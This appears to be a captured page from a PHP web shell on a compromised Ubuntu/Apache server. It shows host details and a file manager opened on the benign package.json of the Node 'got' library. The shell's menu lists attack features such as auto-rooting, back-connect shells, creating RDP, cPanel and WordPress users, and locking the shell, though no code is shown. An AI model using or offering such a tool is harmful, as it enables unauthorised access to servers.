Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.159.93
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
nodejs /
got /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
12.17
KB
-rw-r--r--
package.json
1.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "got", "version": "7.1.0", "description": "Simplified HTTP requests", "license": "MIT", "repository": "sindresorhus/got", "maintainers": [ { "name": "Sindre Sorhus", "email": "sindresorhus@gmail.com", "url": "sindresorhus.com" }, { "name": "Vsevolod Strukchinsky", "email": "floatdrop@gmail.com", "url": "github.com/floatdrop" }, { "name": "Alexander Tesfamichael", "email": "alex.tesfamichael@gmail.com", "url": "alextes.me" } ], "engines": { "node": ">=4" }, "scripts": { "test": "xo && nyc ava", "coveralls": "nyc report --reporter=text-lcov | coveralls" }, "files": [ "index.js" ], "keywords": [ "http", "https", "get", "got", "url", "uri", "request", "util", "utility", "simple", "curl", "wget", "fetch", "net", "network", "electron" ], "dependencies": { "decompress-response": "^3.2.0", "duplexer3": "^0.1.4", "get-stream": "^3.0.0", "is-plain-obj": "^1.1.0", "is-retry-allowed": "^1.0.0", "is-stream": "^1.0.0", "isurl": "^1.0.0-alpha5", "lowercase-keys": "^1.0.0", "p-cancelable": "^0.3.0", "p-timeout": "^1.1.1", "safe-buffer": "^5.0.1", "timed-out": "^4.0.0", "url-parse-lax": "^1.0.0", "url-to-options": "^1.0.1" }, "devDependencies": { "ava": "^0.20.0", "coveralls": "^2.11.4", "form-data": "^2.1.1", "get-port": "^3.0.0", "into-stream": "^3.0.0", "nyc": "^11.0.2", "pem": "^1.4.4", "pify": "^3.0.0", "tempfile": "^2.0.0", "tempy": "^0.1.0", "universal-url": "^1.0.0-alpha", "xo": "^0.18.0" }, "ava": { "concurrency": 4 }, "browser": { "decompress-response": false } }
Close